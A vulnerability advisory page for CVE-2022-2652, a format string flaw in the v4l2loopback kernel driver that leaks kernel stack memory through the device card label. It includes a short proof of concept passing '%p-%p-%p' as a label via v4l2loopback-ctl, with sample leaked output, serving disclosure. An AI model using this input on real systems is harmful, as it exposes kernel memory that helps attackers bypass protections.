Lucene search
Benbe1B055DA5-7A9E-4409-99D7-030280D242D5HistoryJul 28, 2022 - 6:44 p.m.
Format string modifiers in card label
2022-07-2818:44:16
benbe
www.huntr.dev
13
v4l2loopback-ctl
kernel driver
vulnerability
memory leakage
access control
EPSS
0.001
Percentile
17.7%
Description
When adding a new video device with v4l2loopback-ctl that contains a card label with format string modifiers the kernel driver interprets these when querying the device capabilities, thus leaking kernel memory (stack contents).
The vulnerability requires the attacker to have access to the /dev/v4l2loopback, which is owned by root:root with chmod 600 by default. This attack can still be used successfully against kernels in lock down mode.
Proof of Concept
v4l2loopback-ctl add -n "%p-%p-%p"
cat /sys/devices/virtual/video4linux/video2/name
Output (example):
/dev/video2
00000000de899e9f-00000000f6d35a
Expected:
/dev/video2
%p-%p-%p
References
Related
cve
cve
CVE-2022-2652
2022-08-04 10:15:07
debiancve
debiancve
CVE-2022-2652
2022-08-04 10:15:07
ubuntucve
ubuntucve
CVE-2022-2652
2022-08-04 00:00:00
nessus
nessus
openSUSE 15 Security Update : v4l2loopback (openSUSE-SU-2022:10159-1)
2022-10-21 00:00:00
openSUSE 15 Security Update : v4l2loopback (openSUSE-SU-2022:10160-1)
2022-10-21 00:00:00
cvelist
cvelist
nvd
nvd
CVE-2022-2652
2022-08-04 10:15:07
osv
osv
CVE-2022-2652
2022-08-04 10:15:07
prion
prion
Format string
2022-08-04 10:15:00
suse
suse
Security update for v4l2loopback (moderate)
2022-10-20 00:00:00
Security update for v4l2loopback (moderate)
2022-10-20 00:00:00